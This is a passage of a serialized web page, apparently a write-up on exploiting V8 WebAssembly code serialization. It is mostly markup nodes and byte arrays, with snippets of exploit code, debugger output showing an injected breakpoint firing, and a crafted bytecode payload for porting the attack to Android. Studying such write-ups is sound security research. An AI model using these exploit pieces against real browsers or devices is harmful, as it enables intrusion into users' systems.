2,134596,134600,134604,134608,134612,134616,134620,134624,134628,134632,134636,134640,134644,134648,134652,134656,134660,134664,134668,134672,134676,134680,134684,134688,134692,134696,134700,134704,134708,134712,134716,134720,134724,134728,134732,134736,134740,134744,134748,134752,134756,134760,134764,134768,134772,134776,134780,134784,134788,134792,134796,134800,134804,134808,134812,134816,134820,134824,134828,134832,134836],{"type":28,"tag":116,"props":134593,"children":134594},{"style":350},[134595],{"type":33,"value":133808},{"type":28,"tag":116,"props":134597,"children":134598},{"style":266},[134599],{"type":33,"value":825},{"type":28,"tag":116,"props":134601,"children":134602},{"style":350},[134603],{"type":33,"value":353},{"type":28,"tag":116,"props":134605,"children":134606},{"style":266},[134607],{"type":33,"value":825},{"type":28,"tag":116,"props":134609,"children":134610},{"style":350},[134611],{"type":33,"value":134480},{"type":28,"tag":116,"props":134613,"children":134614},{"style":266},[134615],{"type":33,"value":825},{"type":28,"tag":116,"props":134617,"children":134618},{"style":350},[134619],{"type":33,"value":353},{"type":28,"tag":116,"props":134621,"children":134622},{"style":266},[134623],{"type":33,"value":825},{"type":28,"tag":116,"props":134625,"children":134626},{"style":350},[134627],{"type":33,"value":353},{"type":28,"tag":116,"props":134629,"children":134630},{"style":266},[134631],{"type":33,"value":825},{"type":28,"tag":116,"props":134633,"children":134634},{"style":350},[134635],{"type":33,"value":353},{"type":28,"tag":116,"props":134637,"children":134638},{"style":266},[134639],{"type":33,"value":825},{"type":28,"tag":116,"props":134641,"children":134642},{"style":350},[134643],{"type":33,"value":17190},{"type":28,"tag":116,"props":134645,"children":134646},{"style":266},[134647],{"type":33,"value":825},{"type":28,"tag":116,"props":134649,"children":134650},{"style":350},[134651],{"type":33,"value":353},{"type":28,"tag":116,"props":134653,"children":134654},{"style":266},[134655],{"type":33,"value":825},{"type":28,"tag":116,"props":134657,"children":134658},{"style":350},[134659],{"type":33,"value":353},{"type":28,"tag":116,"props":134661,"children":134662},{"style":266},[134663],{"type":33,"value":825},{"type":28,"tag":116,"props":134665,"children":134666},{"style":350},[134667],{"type":33,"value":353},{"type":28,"tag":116,"props":134669,"children":134670},{"style":266},[134671],{"type":33,"value":825},{"type":28,"tag":116,"props":134673,"children":134674},{"style":350},[134675],{"type":33,"value":353},{"type":28,"tag":116,"props":134677,"children":134678},{"style":266},[134679],{"type":33,"value":825},{"type":28,"tag":116,"props":134681,"children":134682},{"style":350},[134683],{"type":33,"value":353},{"type":28,"tag":116,"props":134685,"children":134686},{"style":266},[134687],{"type":33,"value":825},{"type":28,"tag":116,"props":134689,"children":134690},{"style":350},[134691],{"type":33,"value":353},{"type":28,"tag":116,"props":134693,"children":134694},{"style":266},[134695],{"type":33,"value":825},{"type":28,"tag":116,"props":134697,"children":134698},{"style":350},[134699],{"type":33,"value":353},{"type":28,"tag":116,"props":134701,"children":134702},{"style":266},[134703],{"type":33,"value":825},{"type":28,"tag":116,"props":134705,"children":134706},{"style":350},[134707],{"type":33,"value":353},{"type":28,"tag":116,"props":134709,"children":134710},{"style":266},[134711],{"type":33,"value":825},{"type":28,"tag":116,"props":134713,"children":134714},{"style":350},[134715],{"type":33,"value":353},{"type":28,"tag":116,"props":134717,"children":134718},{"style":266},[134719],{"type":33,"value":825},{"type":28,"tag":116,"props":134721,"children":134722},{"style":350},[134723],{"type":33,"value":353},{"type":28,"tag":116,"props":134725,"children":134726},{"style":266},[134727],{"type":33,"value":825},{"type":28,"tag":116,"props":134729,"children":134730},{"style":350},[134731],{"type":33,"value":353},{"type":28,"tag":116,"props":134733,"children":134734},{"style":266},[134735],{"type":33,"value":825},{"type":28,"tag":116,"props":134737,"children":134738},{"style":350},[134739],{"type":33,"value":29078},{"type":28,"tag":116,"props":134741,"children":134742},{"style":266},[134743],{"type":33,"value":825},{"type":28,"tag":116,"props":134745,"children":134746},{"style":350},[134747],{"type":33,"value":353},{"type":28,"tag":116,"props":134749,"children":134750},{"style":266},[134751],{"type":33,"value":825},{"type":28,"tag":116,"props":134753,"children":134754},{"style":350},[134755],{"type":33,"value":353},{"type":28,"tag":116,"props":134757,"children":134758},{"style":266},[134759],{"type":33,"value":825},{"type":28,"tag":116,"props":134761,"children":134762},{"style":350},[134763],{"type":33,"value":353},{"type":28,"tag":116,"props":134765,"children":134766},{"style":266},[134767],{"type":33,"value":825},{"type":28,"tag":116,"props":134769,"children":134770},{"style":350},[134771],{"type":33,"value":353},{"type":28,"tag":116,"props":134773,"children":134774},{"style":266},[134775],{"type":33,"value":825},{"type":28,"tag":116,"props":134777,"children":134778},{"style":350},[134779],{"type":33,"value":353},{"type":28,"tag":116,"props":134781,"children":134782},{"style":266},[134783],{"type":33,"value":825},{"type":28,"tag":116,"props":134785,"children":134786},{"style":350},[134787],{"type":33,"value":353},{"type":28,"tag":116,"props":134789,"children":134790},{"style":266},[134791],{"type":33,"value":825},{"type":28,"tag":116,"props":134793,"children":134794},{"style":350},[134795],{"type":33,"value":353},{"type":28,"tag":116,"props":134797,"children":134798},{"style":266},[134799],{"type":33,"value":825},{"type":28,"tag":116,"props":134801,"children":134802},{"style":350},[134803],{"type":33,"value":353},{"type":28,"tag":116,"props":134805,"children":134806},{"style":266},[134807],{"type":33,"value":825},{"type":28,"tag":116,"props":134809,"children":134810},{"style":350},[134811],{"type":33,"value":353},{"type":28,"tag":116,"props":134813,"children":134814},{"style":266},[134815],{"type":33,"value":825},{"type":28,"tag":116,"props":134817,"children":134818},{"style":350},[134819],{"type":33,"value":353},{"type":28,"tag":116,"props":134821,"children":134822},{"style":266},[134823],{"type":33,"value":825},{"type":28,"tag":116,"props":134825,"children":134826},{"style":350},[134827],{"type":33,"value":353},{"type":28,"tag":116,"props":134829,"children":134830},{"style":266},[134831],{"type":33,"value":825},{"type":28,"tag":116,"props":134833,"children":134834},{"style":350},[134835],{"type":33,"value":353},{"type":28,"tag":116,"props":134837,"children":134838},{"style":266},[134839],{"type":33,"value":3178},{"type":28,"tag":116,"props":134841,"children":134842},{"class":245,"line":713},[134843,134847,134851,134855,134859,134863,134867,134871,134875,134879,134883,134887,134891,134895,134899,134903,134907,134911,134915,134919,134923,134927,134931,134935,134939,134943,134947,134951,134955,134959,134963,134967,134971,134976,134980,134984,134988,134993,134997,135002,135006,135011,135015,135019,135023,135028,135032,135036,135040,135045,135049,135053,135057,135062],{"type":28,"tag":116,"props":134844,"children":134845},{"style":350},[134846],{"type":33,"value":133808},{"type":28,"tag":116,"props":134848,"children":134849},{"style":266},[134850],{"type":33,"value":825},{"type":28,"tag":116,"props":134852,"children":134853},{"style":350},[134854],{"type":33,"value":353},{"type":28,"tag":116,"props":134856,"children":134857},{"style":266},[134858],{"type":33,"value":825},{"type":28,"tag":116,"props":134860,"children":134861},{"style":350},[134862],{"type":33,"value":353},{"type":28,"tag":116,"props":134864,"children":134865},{"style":266},[134866],{"type":33,"value":825},{"type":28,"tag":116,"props":134868,"children":134869},{"style":350},[134870],{"type":33,"value":353},{"type":28,"tag":116,"props":134872,"children":134873},{"style":266},[134874],{"type":33,"value":825},{"type":28,"tag":116,"props":134876,"children":134877},{"style":350},[134878],{"type":33,"value":353},{"type":28,"tag":116,"props":134880,"children":134881},{"style":266},[134882],{"type":33,"value":825},{"type":28,"tag":116,"props":134884,"children":134885},{"style":350},[134886],{"type":33,"value":353},{"type":28,"tag":116,"props":134888,"children":134889},{"style":266},[134890],{"type":33,"value":825},{"type":28,"tag":116,"props":134892,"children":134893},{"style":350},[134894],{"type":33,"value":353},{"type":28,"tag":116,"props":134896,"children":134897},{"style":266},[134898],{"type":33,"value":825},{"type":28,"tag":116,"props":134900,"children":134901},{"style":350},[134902],{"type":33,"value":353},{"type":28,"tag":116,"props":134904,"children":134905},{"style":266},[134906],{"type":33,"value":825},{"type":28,"tag":116,"props":134908,"children":134909},{"style":350},[134910],{"type":33,"value":353},{"type":28,"tag":116,"props":134912,"children":134913},{"style":266},[134914],{"type":33,"value":825},{"type":28,"tag":116,"props":134916,"children":134917},{"style":350},[134918],{"type":33,"value":353},{"type":28,"tag":116,"props":134920,"children":134921},{"style":266},[134922],{"type":33,"value":825},{"type":28,"tag":116,"props":134924,"children":134925},{"style":350},[134926],{"type":33,"value":353},{"type":28,"tag":116,"props":134928,"children":134929},{"style":266},[134930],{"type":33,"value":825},{"type":28,"tag":116,"props":134932,"children":134933},{"style":350},[134934],{"type":33,"value":353},{"type":28,"tag":116,"props":134936,"children":134937},{"style":266},[134938],{"type":33,"value":825},{"type":28,"tag":116,"props":134940,"children":134941},{"style":350},[134942],{"type":33,"value":353},{"type":28,"tag":116,"props":134944,"children":134945},{"style":266},[134946],{"type":33,"value":825},{"type":28,"tag":116,"props":134948,"children":134949},{"style":350},[134950],{"type":33,"value":353},{"type":28,"tag":116,"props":134952,"children":134953},{"style":266},[134954],{"type":33,"value":825},{"type":28,"tag":116,"props":134956,"children":134957},{"style":350},[134958],{"type":33,"value":353},{"type":28,"tag":116,"props":134960,"children":134961},{"style":266},[134962],{"type":33,"value":825},{"type":28,"tag":116,"props":134964,"children":134965},{"style":350},[134966],{"type":33,"value":2794},{"type":28,"tag":116,"props":134968,"children":134969},{"style":266},[134970],{"type":33,"value":825},{"type":28,"tag":116,"props":134972,"children":134973},{"style":350},[134974],{"type":33,"value":134975},"204",{"type":28,"tag":116,"props":134977,"children":134978},{"style":266},[134979],{"type":33,"value":825},{"type":28,"tag":116,"props":134981,"children":134982},{"style":350},[134983],{"type":33,"value":44402},{"type":28,"tag":116,"props":134985,"children":134986},{"style":266},[134987],{"type":33,"value":825},{"type":28,"tag":116,"props":134989,"children":134990},{"style":350},[134991],{"type":33,"value":134992},"137",{"type":28,"tag":116,"props":134994,"children":134995},{"style":266},[134996],{"type":33,"value":825},{"type":28,"tag":116,"props":134998,"children":134999},{"style":350},[135000],{"type":33,"value":135001},"229",{"type":28,"tag":116,"props":135003,"children":135004},{"style":266},[135005],{"type":33,"value":825},{"type":28,"tag":116,"props":135007,"children":135008},{"style":350},[135009],{"type":33,"value":135010},"106",{"type":28,"tag":116,"props":135012,"children":135013},{"style":266},[135014],{"type":33,"value":825},{"type":28,"tag":116,"props":135016,"children":135017},{"style":350},[135018],{"type":33,"value":3745},{"type":28,"tag":116,"props":135020,"children":135021},{"style":266},[135022],{"type":33,"value":825},{"type":28,"tag":116,"props":135024,"children":135025},{"style":350},[135026],{"type":33,"value":135027},"86",{"type":28,"tag":116,"props":135029,"children":135030},{"style":266},[135031],{"type":33,"value":825},{"type":28,"tag":116,"props":135033,"children":135034},{"style":350},[135035],{"type":33,"value":44402},{"type":28,"tag":116,"props":135037,"children":135038},{"style":266},[135039],{"type":33,"value":825},{"type":28,"tag":116,"props":135041,"children":135042},{"style":350},[135043],{"type":33,"value":135044},"139",{"type":28,"tag":116,"props":135046,"children":135047},{"style":266},[135048],{"type":33,"value":825},{"type":28,"tag":116,"props":135050,"children":135051},{"style":350},[135052],{"type":33,"value":135001},{"type":28,"tag":116,"props":135054,"children":135055},{"style":266},[135056],{"type":33,"value":825},{"type":28,"tag":116,"props":135058,"children":135059},{"style":350},[135060],{"type":33,"value":135061},"93",{"type":28,"tag":116,"props":135063,"children":135064},{"style":266},[135065],{"type":33,"value":3178},{"type":28,"tag":116,"props":135067,"children":135068},{"class":245,"line":750},[135069,135074,135078,135082,135086,135090,135094,135098,135102,135106,135110,135114,135118,135122,135126,135130,135134,135138,135142,135146,135150,135154,135158,135162,135166,135170,135174,135178,135182,135186,135190,135194,135198,135202,135206,135210,135214,135218,135222,135226,135230,135234,135238,135242,135246,135250,135254,135258,135262,135266,135270,135274,135278,135282,135286,135290,135294,135298,135302,135306],{"type":28,"tag":116,"props":135070,"children":135071},{"style":350},[135072],{"type":33,"value":135073},"    195",{"type":28,"tag":116,"props":135075,"children":135076},{"style":266},[135077],{"type":33,"value":825},{"type":28,"tag":116,"props":135079,"children":135080},{"style":350},[135081],{"type":33,"value":43930},{"type":28,"tag":116,"props":135083,"children":135084},{"style":266},[135085],{"type":33,"value":825},{"type":28,"tag":116,"props":135087,"children":135088},{"style":350},[135089],{"type":33,"value":59232},{"type":28,"tag":116,"props":135091,"children":135092},{"style":266},[135093],{"type":33,"value":825},{"type":28,"tag":116,"props":135095,"children":135096},{"style":350},[135097],{"type":33,"value":96283},{"type":28,"tag":116,"props":135099,"children":135100},{"style":266},[135101],{"type":33,"value":825},{"type":28,"tag":116,"props":135103,"children":135104},{"style":350},[135105],{"type":33,"value":353},{"type":28,"tag":116,"props":135107,"children":135108},{"style":266},[135109],{"type":33,"value":825},{"type":28,"tag":116,"props":135111,"children":135112},{"style":350},[135113],{"type":33,"value":17190},{"type":28,"tag":116,"props":135115,"children":135116},{"style":266},[135117],{"type":33,"value":825},{"type":28,"tag":116,"props":135119,"children":135120},{"style":350},[135121],{"type":33,"value":353},{"type":28,"tag":116,"props":135123,"children":135124},{"style":266},[135125],{"type":33,"value":825},{"type":28,"tag":116,"props":135127,"children":135128},{"style":350},[135129],{"type":33,"value":353},{"type":28,"tag":116,"props":135131,"children":135132},{"style":266},[135133],{"type":33,"value":825},{"type":28,"tag":116,"props":135135,"children":135136},{"style":350},[135137],{"type":33,"value":353},{"type":28,"tag":116,"props":135139,"children":135140},{"style":266},[135141],{"type":33,"value":825},{"type":28,"tag":116,"props":135143,"children":135144},{"style":350},[135145],{"type":33,"value":353},{"type":28,"tag":116,"props":135147,"children":135148},{"style":266},[135149],{"type":33,"value":825},{"type":28,"tag":116,"props":135151,"children":135152},{"style":350},[135153],{"type":33,"value":353},{"type":28,"tag":116,"props":135155,"children":135156},{"style":266},[135157],{"type":33,"value":825},{"type":28,"tag":116,"props":135159,"children":135160},{"style":350},[135161],{"type":33,"value":353},{"type":28,"tag":116,"props":135163,"children":135164},{"style":266},[135165],{"type":33,"value":825},{"type":28,"tag":116,"props":135167,"children":135168},{"style":350},[135169],{"type":33,"value":353},{"type":28,"tag":116,"props":135171,"children":135172},{"style":266},[135173],{"type":33,"value":825},{"type":28,"tag":116,"props":135175,"children":135176},{"style":350},[135177],{"type":33,"value":353},{"type":28,"tag":116,"props":135179,"children":135180},{"style":266},[135181],{"type":33,"value":825},{"type":28,"tag":116,"props":135183,"children":135184},{"style":350},[135185],{"type":33,"value":17190},{"type":28,"tag":116,"props":135187,"children":135188},{"style":266},[135189],{"type":33,"value":825},{"type":28,"tag":116,"props":135191,"children":135192},{"style":350},[135193],{"type":33,"value":353},{"type":28,"tag":116,"props":135195,"children":135196},{"style":266},[135197],{"type":33,"value":825},{"type":28,"tag":116,"props":135199,"children":135200},{"style":350},[135201],{"type":33,"value":353},{"type":28,"tag":116,"props":135203,"children":135204},{"style":266},[135205],{"type":33,"value":825},{"type":28,"tag":116,"props":135207,"children":135208},{"style":350},[135209],{"type":33,"value":353},{"type":28,"tag":116,"props":135211,"children":135212},{"style":266},[135213],{"type":33,"value":825},{"type":28,"tag":116,"props":135215,"children":135216},{"style":350},[135217],{"type":33,"value":353},{"type":28,"tag":116,"props":135219,"children":135220},{"style":266},[135221],{"type":33,"value":825},{"type":28,"tag":116,"props":135223,"children":135224},{"style":350},[135225],{"type":33,"value":353},{"type":28,"tag":116,"props":135227,"children":135228},{"style":266},[135229],{"type":33,"value":825},{"type":28,"tag":116,"props":135231,"children":135232},{"style":350},[135233],{"type":33,"value":353},{"type":28,"tag":116,"props":135235,"children":135236},{"style":266},[135237],{"type":33,"value":825},{"type":28,"tag":116,"props":135239,"children":135240},{"style":350},[135241],{"type":33,"value":353},{"type":28,"tag":116,"props":135243,"children":135244},{"style":266},[135245],{"type":33,"value":825},{"type":28,"tag":116,"props":135247,"children":135248},{"style":350},[135249],{"type":33,"value":353},{"type":28,"tag":116,"props":135251,"children":135252},{"style":266},[135253],{"type":33,"value":825},{"type":28,"tag":116,"props":135255,"children":135256},{"style":350},[135257],{"type":33,"value":353},{"type":28,"tag":116,"props":135259,"children":135260},{"style":266},[135261],{"type":33,"value":825},{"type":28,"tag":116,"props":135263,"children":135264},{"style":350},[135265],{"type":33,"value":353},{"type":28,"tag":116,"props":135267,"children":135268},{"style":266},[135269],{"type":33,"value":825},{"type":28,"tag":116,"props":135271,"children":135272},{"style":350},[135273],{"type":33,"value":353},{"type":28,"tag":116,"props":135275,"children":135276},{"style":266},[135277],{"type":33,"value":825},{"type":28,"tag":116,"props":135279,"children":135280},{"style":350},[135281],{"type":33,"value":353},{"type":28,"tag":116,"props":135283,"children":135284},{"style":266},[135285],{"type":33,"value":825},{"type":28,"tag":116,"props":135287,"children":135288},{"style":350},[135289],{"type":33,"value":353},{"type":28,"tag":116,"props":135291,"children":135292},{"style":266},[135293],{"type":33,"value":825},{"type":28,"tag":116,"props":135295,"children":135296},{"style":350},[135297],{"type":33,"value":353},{"type":28,"tag":116,"props":135299,"children":135300},{"style":266},[135301],{"type":33,"value":825},{"type":28,"tag":116,"props":135303,"children":135304},{"style":350},[135305],{"type":33,"value":353},{"type":28,"tag":116,"props":135307,"children":135308},{"style":266},[135309],{"type":33,"value":3178},{"type":28,"tag":116,"props":135311,"children":135312},{"class":245,"line":779},[135313,135317,135321,135325,135329,135333,135337,135341,135345,135349,135353,135357,135361,135365,135369,135373,135377,135381,135385,135389,135393,135397,135401,135405,135409,135413,135417,135421,135425,135429,135433,135437,135441,135445,135449,135453,135457,135461,135465,135469,135473,135477,135481,135485,135489,135493,135497,135501,135505,135509,135513,135518,135522,135526],{"type":28,"tag":116,"props":135314,"children":135315},{"style":350},[135316],{"type":33,"value":133808},{"type":28,"tag":116,"props":135318,"children":135319},{"style":266},[135320],{"type":33,"value":825},{"type":28,"tag":116,"props":135322,"children":135323},{"style":350},[135324],{"type":33,"value":353},{"type":28,"tag":116,"props":135326,"children":135327},{"style":266},[135328],{"type":33,"value":825},{"type":28,"tag":116,"props":135330,"children":135331},{"style":350},[135332],{"type":33,"value":353},{"type":28,"tag":116,"props":135334,"children":135335},{"style":266},[135336],{"type":33,"value":825},{"type":28,"tag":116,"props":135338,"children":135339},{"style":350},[135340],{"type":33,"value":353},{"type":28,"tag":116,"props":135342,"children":135343},{"style":266},[135344],{"type":33,"value":825},{"type":28,"tag":116,"props":135346,"children":135347},{"style":350},[135348],{"type":33,"value":353},{"type":28,"tag":116,"props":135350,"children":135351},{"style":266},[135352],{"type":33,"value":825},{"type":28,"tag":116,"props":135354,"children":135355},{"style":350},[135356],{"type":33,"value":353},{"type":28,"tag":116,"props":135358,"children":135359},{"style":266},[135360],{"type":33,"value":825},{"type":28,"tag":116,"props":135362,"children":135363},{"style":350},[135364],{"type":33,"value":353},{"type":28,"tag":116,"props":135366,"children":135367},{"style":266},[135368],{"type":33,"value":825},{"type":28,"tag":116,"props":135370,"children":135371},{"style":350},[135372],{"type":33,"value":353},{"type":28,"tag":116,"props":135374,"children":135375},{"style":266},[135376],{"type":33,"value":825},{"type":28,"tag":116,"props":135378,"children":135379},{"style":350},[135380],{"type":33,"value":353},{"type":28,"tag":116,"props":135382,"children":135383},{"style":266},[135384],{"type":33,"value":825},{"type":28,"tag":116,"props":135386,"children":135387},{"style":350},[135388],{"type":33,"value":353},{"type":28,"tag":116,"props":135390,"children":135391},{"style":266},[135392],{"type":33,"value":825},{"type":28,"tag":116,"props":135394,"children":135395},{"style":350},[135396],{"type":33,"value":353},{"type":28,"tag":116,"props":135398,"children":135399},{"style":266},[135400],{"type":33,"value":825},{"type":28,"tag":116,"props":135402,"children":135403},{"style":350},[135404],{"type":33,"value":353},{"type":28,"tag":116,"props":135406,"children":135407},{"style":266},[135408],{"type":33,"value":825},{"type":28,"tag":116,"props":135410,"children":135411},{"style":350},[135412],{"type":33,"value":353},{"type":28,"tag":116,"props":135414,"children":135415},{"style":266},[135416],{"type":33,"value":825},{"type":28,"tag":116,"props":135418,"children":135419},{"style":350},[135420],{"type":33,"value":353},{"type":28,"tag":116,"props":135422,"children":135423},{"style":266},[135424],{"type":33,"value":825},{"type":28,"tag":116,"props":135426,"children":135427},{"style":350},[135428],{"type":33,"value":353},{"type":28,"tag":116,"props":135430,"children":135431},{"style":266},[135432],{"type":33,"value":825},{"type":28,"tag":116,"props":135434,"children":135435},{"style":350},[135436],{"type":33,"value":353},{"type":28,"tag":116,"props":135438,"children":135439},{"style":266},[135440],{"type":33,"value":825},{"type":28,"tag":116,"props":135442,"children":135443},{"style":350},[135444],{"type":33,"value":353},{"type":28,"tag":116,"props":135446,"children":135447},{"style":266},[135448],{"type":33,"value":825},{"type":28,"tag":116,"props":135450,"children":135451},{"style":350},[135452],{"type":33,"value":353},{"type":28,"tag":116,"props":135454,"children":135455},{"style":266},[135456],{"type":33,"value":825},{"type":28,"tag":116,"props":135458,"children":135459},{"style":350},[135460],{"type":33,"value":353},{"type":28,"tag":116,"props":135462,"children":135463},{"style":266},[135464],{"type":33,"value":825},{"type":28,"tag":116,"props":135466,"children":135467},{"style":350},[135468],{"type":33,"value":353},{"type":28,"tag":116,"props":135470,"children":135471},{"style":266},[135472],{"type":33,"value":825},{"type":28,"tag":116,"props":135474,"children":135475},{"style":350},[135476],{"type":33,"value":353},{"type":28,"tag":116,"props":135478,"children":135479},{"style":266},[135480],{"type":33,"value":825},{"type":28,"tag":116,"props":135482,"children":135483},{"style":350},[135484],{"type":33,"value":353},{"type":28,"tag":116,"props":135486,"children":135487},{"style":266},[135488],{"type":33,"value":825},{"type":28,"tag":116,"props":135490,"children":135491},{"style":350},[135492],{"type":33,"value":353},{"type":28,"tag":116,"props":135494,"children":135495},{"style":266},[135496],{"type":33,"value":825},{"type":28,"tag":116,"props":135498,"children":135499},{"style":350},[135500],{"type":33,"value":29078},{"type":28,"tag":116,"props":135502,"children":135503},{"style":266},[135504],{"type":33,"value":825},{"type":28,"tag":116,"props":135506,"children":135507},{"style":350},[135508],{"type":33,"value":135061},{"type":28,"tag":116,"props":135510,"children":135511},{"style":266},[135512],{"type":33,"value":825},{"type":28,"tag":116,"props":135514,"children":135515},{"style":350},[135516],{"type":33,"value":135517},"198",{"type":28,"tag":116,"props":135519,"children":135520},{"style":266},[135521],{"type":33,"value":825},{"type":28,"tag":116,"props":135523,"children":135524},{"style":350},[135525],{"type":33,"value":353},{"type":28,"tag":116,"props":135527,"children":135528},{"style":266},[135529],{"type":33,"value":3178},{"type":28,"tag":116,"props":135531,"children":135532},{"class":245,"line":796},[135533],{"type":28,"tag":116,"props":135534,"children":135535},{"style":266},[135536],{"type":33,"value":134095},{"type":28,"tag":116,"props":135538,"children":135539},{"class":245,"line":847},[135540,135544,135549,135553,135558,135562,135566,135570,135574,135578,135582],{"type":28,"tag":116,"props":135541,"children":135542},{"style":376},[135543],{"type":33,"value":7527},{"type":28,"tag":116,"props":135545,"children":135546},{"style":272},[135547],{"type":33,"value":135548}," r",{"type":28,"tag":116,"props":135550,"children":135551},{"style":370},[135552],{"type":33,"value":2226},{"type":28,"tag":116,"props":135554,"children":135555},{"style":282},[135556],{"type":33,"value":135557}," bug",{"type":28,"tag":116,"props":135559,"children":135560},{"style":266},[135561],{"type":33,"value":313},{"type":28,"tag":116,"props":135563,"children":135564},{"style":272},[135565],{"type":33,"value":133426},{"type":28,"tag":116,"props":135567,"children":135568},{"style":266},[135569],{"type":33,"value":825},{"type":28,"tag":116,"props":135571,"children":135572},{"style":272},[135573],{"type":33,"value":124755},{"type":28,"tag":116,"props":135575,"children":135576},{"style":266},[135577],{"type":33,"value":141},{"type":28,"tag":116,"props":135579,"children":135580},{"style":272},[135581],{"type":33,"value":124755},{"type":28,"tag":116,"props":135583,"children":135584},{"style":266},[135585],{"type":33,"value":895},{"type":28,"tag":116,"props":135587,"children":135588},{"class":245,"line":898},[135589,135594,135598,135602,135606,135610,135614,135618,135623,135627],{"type":28,"tag":116,"props":135590,"children":135591},{"style":272},[135592],{"type":33,"value":135593},"  result",{"type":28,"tag":116,"props":135595,"children":135596},{"style":370},[135597],{"type":33,"value":2226},{"type":28,"tag":116,"props":135599,"children":135600},{"style":266},[135601],{"type":33,"value":269},{"type":28,"tag":116,"props":135603,"children":135604},{"style":260},[135605],{"type":33,"value":1091},{"type":28,"tag":116,"props":135607,"children":135608},{"style":272},[135609],{"type":33,"value":135548},{"type":28,"tag":116,"props":135611,"children":135612},{"style":266},[135613],{"type":33,"value":141},{"type":28,"tag":116,"props":135615,"children":135616},{"style":282},[135617],{"type":33,"value":57184},{"type":28,"tag":116,"props":135619,"children":135620},{"style":266},[135621],{"type":33,"value":135622},"()).",{"type":28,"tag":116,"props":135624,"children":135625},{"style":272},[135626],{"type":33,"value":38773},{"type":28,"tag":116,"props":135628,"children":135629},{"style":266},[135630],{"type":33,"value":384},{"type":28,"tag":116,"props":135632,"children":135633},{"class":245,"line":907},[135634,135638,135643,135647,135651,135655,135659,135663,135667,135671],{"type":28,"tag":116,"props":135635,"children":135636},{"style":376},[135637],{"type":33,"value":35814},{"type":28,"tag":116,"props":135639,"children":135640},{"style":272},[135641],{"type":33,"value":135642}," wasm_instance",{"type":28,"tag":116,"props":135644,"children":135645},{"style":370},[135646],{"type":33,"value":2226},{"type":28,"tag":116,"props":135648,"children":135649},{"style":376},[135650],{"type":33,"value":31582},{"type":28,"tag":116,"props":135652,"children":135653},{"style":272},[135654],{"type":33,"value":133409},{"type":28,"tag":116,"props":135656,"children":135657},{"style":266},[135658],{"type":33,"value":141},{"type":28,"tag":116,"props":135660,"children":135661},{"style":282},[135662],{"type":33,"value":133463},{"type":28,"tag":116,"props":135664,"children":135665},{"style":266},[135666],{"type":33,"value":313},{"type":28,"tag":116,"props":135668,"children":135669},{"style":272},[135670],{"type":33,"value":8751},{"type":28,"tag":116,"props":135672,"children":135673},{"style":266},[135674],{"type":33,"value":895},{"type":28,"tag":116,"props":135676,"children":135677},{"class":245,"line":981},[135678,135682,135686,135690,135694,135698,135702,135706,135710],{"type":28,"tag":116,"props":135679,"children":135680},{"style":376},[135681],{"type":33,"value":35814},{"type":28,"tag":116,"props":135683,"children":135684},{"style":272},[135685],{"type":33,"value":32605},{"type":28,"tag":116,"props":135687,"children":135688},{"style":370},[135689],{"type":33,"value":2226},{"type":28,"tag":116,"props":135691,"children":135692},{"style":272},[135693],{"type":33,"value":135642},{"type":28,"tag":116,"props":135695,"children":135696},{"style":266},[135697],{"type":33,"value":141},{"type":28,"tag":116,"props":135699,"children":135700},{"style":272},[135701],{"type":33,"value":37509},{"type":28,"tag":116,"props":135703,"children":135704},{"style":266},[135705],{"type":33,"value":141},{"type":28,"tag":116,"props":135707,"children":135708},{"style":272},[135709],{"type":33,"value":133512},{"type":28,"tag":116,"props":135711,"children":135712},{"style":266},[135713],{"type":33,"value":384},{"type":28,"tag":116,"props":135715,"children":135716},{"class":245,"line":1011},[135717,135722],{"type":28,"tag":116,"props":135718,"children":135719},{"style":282},[135720],{"type":33,"value":135721},"  f",{"type":28,"tag":116,"props":135723,"children":135724},{"style":266},[135725],{"type":33,"value":1445},{"type":28,"tag":116,"props":135727,"children":135728},{"class":245,"line":1029},[135729],{"type":28,"tag":116,"props":135730,"children":135731},{"style":266},[135732],{"type":33,"value":101599},{"type":28,"tag":29,"props":135734,"children":135735},{},[135736],{"type":33,"value":135737},"Running this in a debugger shows the expected breakpoint:",{"type":28,"tag":234,"props":135739,"children":135741},{"code":135740},"Thread 1 \"d8\" received signal SIGTRAP, Trace/breakpoint trap.\n0x00002ae46bfc1841 in ?? ()\n────────────────────────────────────────────────────────────────────────────\n   0x2ae46bfc183c                  add    BYTE PTR [rax], al\n   0x2ae46bfc183e                  add    BYTE PTR [rax], al\n   0x2ae46bfc1840                  int3\n → 0x2ae46bfc1841                  mov    rbp, rsp\n",[135742],{"type":28,"tag":98,"props":135743,"children":135744},{"__ignoreMap":7},[135745],{"type":33,"value":135740},{"type":28,"tag":75,"props":135747,"children":135749},{"id":135748},"porting-to-android",[135750],{"type":33,"value":135751},"Porting to Android",{"type":28,"tag":29,"props":135753,"children":135754},{},[135755,135757,135762,135764,135769,135771,135776,135778,135784],{"type":33,"value":135756},"The serialized x86-64 code can’t be used on the device because the architecture differs, and ",{"type":28,"tag":98,"props":135758,"children":135760},{"className":135759},[],[135761],{"type":33,"value":132541},{"type":33,"value":135763}," fails. We cross-compiled ",{"type":28,"tag":98,"props":135765,"children":135767},{"className":135766},[],[135768],{"type":33,"value":131700},{"type":33,"value":135770}," for arm64 and serialized the module there, but this still didn’t work on the device and ",{"type":28,"tag":98,"props":135772,"children":135774},{"className":135773},[],[135775],{"type":33,"value":132541},{"type":33,"value":135777}," returned ",{"type":28,"tag":98,"props":135779,"children":135781},{"className":135780},[],[135782],{"type":33,"value":135783},"undefined",{"type":33,"value":141},{"type":28,"tag":29,"props":135786,"children":135787},{},[135788,135790,135795,135797,135802],{"type":33,"value":135789},"Instead, we modified the bytecode to call ",{"type":28,"tag":98,"props":135791,"children":135793},{"className":135792},[],[135794],{"type":33,"value":132567},{"type":33,"value":135796}," directly on the device. The idea is to serialize the code on the device and then feed the resulting bytes back into the original bytecode that calls ",{"type":28,"tag":98,"props":135798,"children":135800},{"className":135799},[],[135801],{"type":33,"value":132541},{"type":33,"value":141},{"type":28,"tag":234,"props":135804,"children":135806},{"code":135805,"language":35241,"meta":7,"className":35239,"style":7},"try {\n  ${'a1 + 0xa931111;'.repeat(0x059301 - 1)}\n  a1 + 0x03027a6c;\n  throw 0x393e71a;\n} catch (e) {\n  console.log(\"foo\");\n  yield 